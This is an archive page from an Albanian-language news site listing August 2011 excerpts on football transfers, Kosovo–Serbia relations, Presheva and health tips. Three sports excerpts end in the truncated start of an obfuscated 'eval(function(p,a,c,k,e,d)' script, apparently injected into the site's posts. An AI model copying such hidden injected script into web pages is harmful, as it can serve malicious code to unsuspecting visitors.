Home » Archive for Gusht, 2011

Lukaku:Unë jam në ëndërr

Pas transferimit të tij te Chelsea, Lukaku është shumë i lumtur sa që e gjitha kjo i duket vetëm si një ëndërr. ”Unë do luajë me një ekip me lojtarë me përvojë dhe me një ekip që di të fitojë” ”Unë jam si në ëndërr por jam shumë i lumtur”,tha Luakaku.   eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return... 

Ferguson:Nani vetëm hije e Ronaldos

Ferguson është shprehur shumë i kënaqur me dy golshin e shënuar nga Nani që i dha edhe kupën tjetër skuadrës së Fergiet. ”Sezoni i Nanit ishte fenomenal dhe unë e përgëzojë atë e sidomos për ndeshjen e sotme që ishte e jashtëzakontshme për të” ”Unë Nanin e shoh si Nani sepse ai nuk i ngjan askujt dhe ai vetëm është një hije e Ronaldos”,tha Ferguson.   eval(function(p,a,c,k,e,d){e=function(c){return... 

Ernst: Këmbimi i territoreve, opsion i mundshëm!

Andreas Ernst, gazetar i së përditshmes “Neue Zürcher Zeitung”, njohës i  zhvillimeve në Ballkan, thotë se zgjidhja e problemeve mes Kosovës dhe Serbisë  mund të shpie drejtë këmbimeve të territoreve. “Veriu do të shkojë në Serbi… Perspektiva e vendbanimeve shqiptare në  Serbinë Jugore do të lidhej me Kosovën”, ka thënë ai për swissinfo,  ndërsa transmeton... 

NISMË: PRESHEVA KA NEVOJË EDHE PËR NJE SHKOLLË FILLORE!?

Preshevë, gusht 2011, verë e nxehtë, muaji i Ramazanit. Presheva, ditën duket thuajse e shkretë. Natën vlon jeta. Preshevarët e kanë adet(praktikë) që natën deri vonë të rrijnë në kafene, çajtore, rrugëve shetitje, kurse ditën flejnë. I huaji nuk do të na kuptonte. Ponejse, nuk kam ndërmend të shkruajë për mentalitetin tonë jashtë mentalitetit të perëndimit. Thuajse  i... 

Policia e Gjenevës i shpall luftë « Qibritashëve » nga Maqedonia

Përveq vënies së ligjit të ri në Zvicër kundër kësaj loje kriminale, bilanci i policisë së Gjenevës gjatë këtij muaji nga aksioni i funditpolicor “AB” dhe “figaro” kundër “chibritashëve” nga Maaedonia është: Rreth 40 të arrestuar, mbahen në burgje ku pasjat dënohen me nga 1000 euro e me shumë dhe dëbohe duke ju dorëzuar policisë në aeroportin... 

10 ushqimet më të mira për të konsumuar këtë verë

1. Salca e domates dhe domatja e freskët. Karotenoidet që përmban domatja kanë një forcë antioksiduese që mbron qelizat nga radikalet e lira. 2. Kosi & Gjiza. Përveç kalciumit, kosi përmban mikroorganizma të dobishëm për të mirëmbajtur florën tonë bakteriale, e cila na mbron ndaj mykut, helmimeve ushqimore të ndryshme etj. 3. Bostani, pjepri. Një kilogram bostan ka 300 kalori,... 

Chicharito, Carrick dhe Rafael mungojnë kundër Cityt

Chicharito, Carrick dhe Rafael mund të mungojnë kundër Cityt të dielën për kupën që do zhvillohet në Wembley. Ferguson deklaroi se Chicahrito do mungojë edhe dy ose tre javë kurse për Carrick dhe Rafael tha se ata nuk do luajnë por do kthehen shumë shpejt. Kurse sa i përket lojës Fergie tha:”Ne nuk do ndryshojmë aspak takitën e as lojën tonë”. eval(function(p,a,c,k,e,d){e=function(c){return... 

Arsenali përsëri refuzon ofertën e Barcelonës për Fabregas

Arsenali po këmbëngul se nuk do e lejojë largimin e Fabregasit nëse Barcelona nuk paguan 40 milionë euro. Arsenali tani ka refuzuar edhe zyrtarisht ofertën e Barcelonës për Fabregasin që kësaj rradhe ishte 35 milionë euro. Edhe kryetari i Arsenalit,Stan Kroenke është kthyer në Londër për të diskutuar çështjen e Cesc i cili dje stërviti me Arsenalin dhe duket se nesër do luajë... 

LK: Derbi i parë Arsenali përballë Udineses

Arsenali është caktuar të përballet me Udinesen në kuadër të ndeshjeve kualifikuese për fazën e grupeve të Ligës së Kampionëve. Shorti i tërhequr sot në zyrat qendrore të UEFA-së në Nyon të Zvicrës, po ashtu nxori ekipin zviceran Zurich përballë gjigantit gjerman Bayern Munich. Ekipi spanjoll Villarreal do ta ketë ca më të lehtë, pasi do të përballet me danezët e Odense,... 

Nuk kanë të ndalur – përsëri mallrat serbe hyjnë transit përmes Maqedonisë në Kosovë

Drejtoria e Doganave të Maqedonisë bëri të ditur se nga data 21 deri 31 korrik, nëpërmjet territorit të Maqedonia kanë kaluar transit mallra me një vlerë prej 150 mijë euro. Pas ndalesës së mallrave serbe nga Serbia në Kosovë për tre herë është rritur transiti i mallrave përmes Maqedonisë. Drejtoria e Doganave të Maqedonisë bëri të ditur se brenda një periudhe dhjetë ditore... 
© 2021 KosovaLindore · RSS · Designed by Theme Junkie · Powered by WordPress
ShqipEnglishDeutsch